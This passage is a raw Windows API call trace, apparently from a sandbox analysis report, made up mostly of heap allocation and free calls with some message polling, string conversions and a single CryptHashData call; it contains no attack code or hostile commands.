(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0268.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0268.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0268.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0268.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0268.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.217] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.220] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0268.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55028, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.222] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.222] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0268.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51d90 [0268.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51d90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0268.223] CryptHashData (hHash=0xa87690, pbData=0x2e55008, dwDataLen=0x3, dwFlags=0x1) returned 1 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 